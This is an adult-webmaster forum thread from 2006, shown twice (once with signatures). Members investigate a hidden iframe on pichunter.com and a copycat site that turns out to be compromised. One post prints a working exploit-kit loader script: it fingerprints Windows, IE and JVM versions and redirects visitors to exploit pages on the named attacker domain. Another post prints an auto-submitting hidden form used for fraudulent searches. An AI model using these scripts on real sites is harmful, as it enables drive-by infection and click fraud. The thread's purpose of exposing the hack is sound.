Pichunter - Clever seo ? or ? - GoFuckYourself.com

SmokeyTheBear · 10-28-2006, 01:21 AM

go to pichunter.com , notice at the very bottom theres a hidden 0x0 iframe pointing to http://seekmat.com/my.php?iframe=1

pointing to wierd pages like http://colombia.seekmat.com/ is that some sort of seo work or did pichunter get hacked

also is this pichunters site wxw.dougansss.com/tgp/ ( DO NOT VISIT - VIRUS ON PAGE )

all the images are hotlinked from pichunter which isnt so strange but all the ref codes appear to also be pichunters ref codes , nastydollars , tcg bangrbros realitycash and that seems strange to just give all the traffic away to pichunter and make him free money while infecting people with an unknown virus

Tempest · 10-28-2006, 02:08 AM

I didn't get an iframe on the page that loaded for me.

Daruma · 10-28-2006, 02:11 AM

nothing for me on mac ;)

martinsc · 10-28-2006, 02:12 AM

i don't get it...

do people really think that hidden content is still helping them with the SE's?

Daruma · 10-28-2006, 02:12 AM

extremeeeem
delay

on mac

autocad????????????

2HousePlague · 10-28-2006, 03:56 AM

State of the Art, yo.

2hp

borked · 10-28-2006, 04:16 AM

no iframe on my FF on a Mac -
seekmat.com/my.php?iframe=1 is weird though - just random form post actions...
eg:

Code:

<html>
<form name="x" method="post" action="http://invicta.bfind.info/search.php?q=invicta 9937">
<input type="hidden" name="guest" value="1">
</form>
<script>
x.submit();
</script>
</html>

where the action="" changes randomly upon reload...

borked · 10-28-2006, 04:20 AM

my guess is random searches for a pay per search programme or something.... so every visitor generates a hidden search which earns him .0000001cent or something.

DarkJedi · 10-28-2006, 04:23 AM

Black SEO doorway pages. Nothing clever about them though.

Matt 26z · 10-28-2006, 05:41 AM

Just a guess here... Using the PicHunter domain to increase the pagerank of those SE pages, and then doing a redirect once they get picked up?

Whatever the case, don't you have anything better to do than look at the source code of TGP's? lol

Jakke PNG · 10-28-2006, 06:04 AM

Quote:

Originally Posted by Matt 26z

Whatever the case, don't you have anything better to do than look at the source code of TGP's? lol

It's actually pretty nice to know SOMEONE looks at shady shit. I know I don't have time.

SmokeyTheBear · 10-28-2006, 07:57 AM

Quote:

Originally Posted by Matt 26z

Just a guess here... Using the PicHunter domain to increase the pagerank of those SE pages, and then doing a redirect once they get picked up?

Whatever the case, don't you have anything better to do than look at the source code of TGP's? lol

someone asked me to check out their tgp because they suspected something in the code causing a skim ofg traffic to cgi-dnsl.com that turns out to be dougansss.com that is just a copy of pichunter including the hidden iframes on both sites . turns out he was right .

DjSap · 10-28-2006, 08:01 AM

i would hope that the owner is smart enough to fuck with se's, since he has an established site and not a new one...

rhizome · 10-28-2006, 08:40 AM

dougansss.com is responsible for the TM3 hacks. He also totally fucked up my server forcing me to get a new one.

the Shemp · 10-28-2006, 12:30 PM

bump....

vcup · 10-28-2006, 12:33 PM

how do i get on pichunter?

RRRED · 10-28-2006, 12:37 PM

I don't get it...

emthree · 10-28-2006, 12:39 PM

SEO IMG Spam?

fris · 10-28-2006, 12:40 PM

i doubt pichunter is a part of that.

jacked · 10-28-2006, 12:42 PM

seems pretty sketchie to me...

free4porn · 10-28-2006, 12:51 PM

does sound strange to me

polle54 · 10-28-2006, 12:56 PM

well

the iframe on wxw.dougansss.com/tgp/ is definately exploits....

this is the exploit code....
wxw.dougansss.com/dar/loading.html
and it explains why I wasn't hit by it when I entered, it's only IE they target...

Code:

<IE:clientCaps ID="oClientCaps" /> 
<script type="text/javascript" language="JavaScript">
 var ExploitNumber=0; 
 var Bug_param="";

 function GetVersion(CLSID)
   {
            if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
               {return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
            else
               {return Array(0,0,0,0);}
   }

 function Get_Win_Version(IE_vers)
   {
     if (IE_vers.indexOf('Windows 95') != -1) return "95"
     else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
     else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
     else if (IE_vers.indexOf('Windows 98') != -1) return "98"
     else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
     else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
     else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
   }
 
 var CGI_Script="http://wxw.dougansss.com/dar/";
 if (navigator.appName=="Microsoft Internet Explorer")
   {
     
      var IEversion=navigator.appVersion;
      var IEplatform=navigator.platform;
      if (IEplatform.search("Win32") != -1)
      {
         var WinOS=Get_Win_Version(IEversion);
         FullVersion=clientInformation.appMinorVersion;
         PatchList=FullVersion.split(";");
                
         var JVM_vers  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}"); 
         var IE_vers   = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");
         
         var XP_SP2_patched=0;
          
         switch (WinOS)
         {
             case "2K":
                       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                       {  ExploitNumber=1;  }    
                       else                                // if JVM = 5.0.3810.0 or higher
                       { 
                         if (IE_vers[0]==6)
                         {  ExploitNumber=3; }
                         else
                         {  ExploitNumber=2; }
                       } 
                       
                       break;
             case "2K3":
                       ExploitNumber=3;  
                       break;             
             case "XP":
                                                                
                            if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                            {  ExploitNumber=1;  }    
                            else                                // if JVM = 5.0.3810.0 or higher
                            {
                               for (var i=0; i < PatchList.length; i++)
                               {  
                                  if (PatchList[i]=="SP2")
                                  {  XP_SP2_patched=1; }
                                 
                               }
                               if (XP_SP2_patched==0)
                               {
                                  ExploitNumber=3;  
                               }
                               else
                               {
                                  ExploitNumber=4;   
                               }
                            }
                       break;          
             default:  
                       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                       {  ExploitNumber=1;  }             
                       else
                       {  ExploitNumber=2;  }            // if JVM = 5.0.3810.0 or higher
                     
                       break;         
         }
         // launching exploit which number is depends on Windows and IE versions
              
         switch (ExploitNumber)
         {
             case  1:
					// 95, NT, ME, 98, 2k, XP
                       Bug_param=Bug_param+"e1/e1.html";
                       break;
             case  2:
					// 95, NT, ME, 98, 2k - if JVM = 5.0.3810.0 or higher
                       Bug_param=Bug_param+"e2/e2.html";
                       break;
             case  3:
					// 2k+IE6, 2K3, XP+SP1 - if JVM = 5.0.3810.0 or higher
                       Bug_param=Bug_param+"e3/e3.html";
                       break; 
             default:
                       break;                   
          }
      }
   }

if (Bug_param != ''){
	window.location=CGI_Script+Bug_param;
}

it's not like they are trying to hide it's a exploit LOL

polle54 · 10-28-2006, 01:06 PM

and another thing

the reason they have all the same ref's and things are because they stole all the gallery links and thumbs.. the easiest way to maintain a CJ site...
I don't think it's illigal since all the content is third party and submitted to all kind of sites...

I highly doubt that pichunter has anything to do with this site.

They probably send 0% to the content and the traffic probably comes from varius hacks and maybe trading in the dark area of this industry

gotys · 10-30-2006, 12:30 PM

Well am I glad I got this 2 days late

Someone appereantly hacked us. You guys need to ICQ me when you find something like this, please!

Thank you for pointing it out at least here though

SmokeyTheBear · 10-30-2006, 12:55 PM

Quote:

Originally Posted by gotys

Well am I glad I got this 2 days late

Someone appereantly hacked us. You guys need to ICQ me when you find something like this, please!

Thank you for pointing it out at least here though

sorry i didnt have any contact info or i would have.. figured gfy word of mouth usually travels fastest

bp4l-xp · 12-15-2006, 11:56 AM

sorry to bump this one but
we also have been hacked by this motherfucker
he is a russian guy
russian business network (his host) doesn't give a fuck about my ABUSE mail.

be careful, change your passwords and protect your scripts with passwords!

10-28-2006, 01:21 AM	#1
SmokeyTheBear ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer Posts: 28,609	Pichunter - Clever seo ? or ? go to pichunter.com , notice at the very bottom theres a hidden 0x0 iframe pointing to http://seekmat.com/my.php?iframe=1 pointing to wierd pages like http://colombia.seekmat.com/ is that some sort of seo work or did pichunter get hacked also is this pichunters site wxw.dougansss.com/tgp/ ( DO NOT VISIT - VIRUS ON PAGE ) all the images are hotlinked from pichunter which isnt so strange but all the ref codes appear to also be pichunters ref codes , nastydollars , tcg bangrbros realitycash and that seems strange to just give all the traffic away to pichunter and make him free money while infecting people with an unknown virus __________________ hatisblack at yahoo.com

10-28-2006, 02:11 AM	#3
Daruma Confirmed User Join Date: Nov 2002 Location: PandaLand™ Posts: 3,494	nothing for me on mac ;) __________________ RIP TD

10-28-2006, 02:12 AM	#4
martinsc Too lazy to set a custom title Industry Role: Join Date: Jun 2005 Location: 127.0.0.1 Posts: 27,047	i don't get it... do people really think that hidden content is still helping them with the SE's? __________________ Make Money

10-28-2006, 02:12 AM	#5
Daruma Confirmed User Join Date: Nov 2002 Location: PandaLand™ Posts: 3,494	extremeeeem delay on mac autocad???????????? __________________ RIP TD

10-28-2006, 03:56 AM	#6
2HousePlague CURATOR Join Date: Jul 2004 Location: the attic Posts: 14,572	State of the Art, yo. 2hp __________________ tada!

10-28-2006, 02:08 AM	#2
Tempest Too lazy to set a custom title Industry Role: Join Date: May 2004 Location: West Coast, Canada. Posts: 10,217	I didn't get an iframe on the page that loaded for me.

10-28-2006, 04:16 AM	#7
borked Totally Borked Industry Role: Join Date: Feb 2005 Posts: 6,284	no iframe on my FF on a Mac - seekmat.com/my.php?iframe=1 is weird though - just random form post actions... eg: Code: <html> <form name="x" method="post" action="http://invicta.bfind.info/search.php?q=invicta 9937"> <input type="hidden" name="guest" value="1"> </form> <script> x.submit(); </script> </html> where the action="" changes randomly upon reload... __________________ For coding work - hit me up on andy // borkedcoder // com (consider figuring out the email as test #1) All models are wrong, but some are useful. George E.P. Box. p202

10-28-2006, 04:20 AM	#8
borked Totally Borked Industry Role: Join Date: Feb 2005 Posts: 6,284	my guess is random searches for a pay per search programme or something.... so every visitor generates a hidden search which earns him .0000001cent or something. __________________ For coding work - hit me up on andy // borkedcoder // com (consider figuring out the email as test #1) All models are wrong, but some are useful. George E.P. Box. p202

10-28-2006, 04:23 AM	#9
DarkJedi No Refunds Issued. Industry Role: Join Date: Feb 2001 Location: GFY Posts: 28,300	Black SEO doorway pages. Nothing clever about them though.

10-28-2006, 05:41 AM	#10
Matt 26z So Fucking Banned Industry Role: Join Date: Apr 2002 Location: ¤ª"˜¨๑۩۞۩๑¨˜"ª¤ Posts: 18,481	Just a guess here... Using the PicHunter domain to increase the pagerank of those SE pages, and then doing a redirect once they get picked up? Whatever the case, don't you have anything better to do than look at the source code of TGP's? lol

10-28-2006, 08:01 AM	#13
DjSap Confirmed User Join Date: Jul 2002 Posts: 3,869	i would hope that the owner is smart enough to fuck with se's, since he has an established site and not a new one... __________________ Blog Themes, TGP Design, Writing Services, Grunt Work ICQ: 66871495

10-28-2006, 08:40 AM	#14
rhizome Confirmed User Industry Role: Join Date: Jan 2001 Posts: 788	dougansss.com is responsible for the TM3 hacks. He also totally fucked up my server forcing me to get a new one.

10-28-2006, 12:30 PM	#15
the Shemp congrats to the winners Industry Role: Join Date: Nov 2001 Location: Echo Beach Posts: 10,891	bump.... __________________ i use Vacares...so should you Submit your picture galleries to my site...Outlaw TGP

10-28-2006, 12:33 PM	#16
vcup Registered User Join Date: Jan 2006 Posts: 2	how do i get on pichunter?

10-28-2006, 12:37 PM	#17
RRRED Confirmed User Join Date: Jan 2001 Location: WA Posts: 6,754	I don't get it...

10-28-2006, 12:39 PM	#18
emthree Dialer Kingpin Join Date: Jun 2003 Location: New York Posts: 10,816	SEO IMG Spam? __________________ • Sell Patches & Pills •

10-28-2006, 12:40 PM	#19
fris Too lazy to set a custom title Industry Role: Join Date: Aug 2002 Posts: 55,372	i doubt pichunter is a part of that. __________________ Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence. WP Stuff

10-28-2006, 12:42 PM	#20
jacked sperm tail Industry Role: Join Date: May 2004 Location: nj Posts: 11,019	seems pretty sketchie to me... __________________ Got Cam Models? icq: 361-607-616

10-28-2006, 12:51 PM	#21
free4porn Confirmed User Join Date: Jun 2005 Posts: 4,654	does sound strange to me __________________ Switch To Fling Now! I'm on 1:201 paid signups sending little traffic! Make $$$ Free Porn

10-28-2006, 01:06 PM	#23
polle54 Confirmed User Join Date: Jul 2004 Location: The Beach Posts: 4,626	and another thing the reason they have all the same ref's and things are because they stole all the gallery links and thumbs.. the easiest way to maintain a CJ site... I don't think it's illigal since all the content is third party and submitted to all kind of sites... I highly doubt that pichunter has anything to do with this site. They probably send 0% to the content and the traffic probably comes from varius hacks and maybe trading in the dark area of this industry __________________ ICQ# 143561781 Last edited by polle54; 10-28-2006 at 01:07 PM..

10-30-2006, 12:30 PM	#24
gotys Confirmed User Join Date: Feb 2002 Location: Europe Posts: 767	Well am I glad I got this 2 days late Someone appereantly hacked us. You guys need to ICQ me when you find something like this, please! Thank you for pointing it out at least here though __________________ PicHunter.com,ClipHunter.com,HomeTwat.com -------------------------------------------- not accepting any trades, not selling spots

12-15-2006, 11:56 AM	#26
bp4l-xp Confirmed User Join Date: May 2003 Location: Turkiye Posts: 168	sorry to bump this one but we also have been hacked by this motherfucker he is a russian guy russian business network (his host) doesn't give a fuck about my ABUSE mail. be careful, change your passwords and protect your scripts with passwords!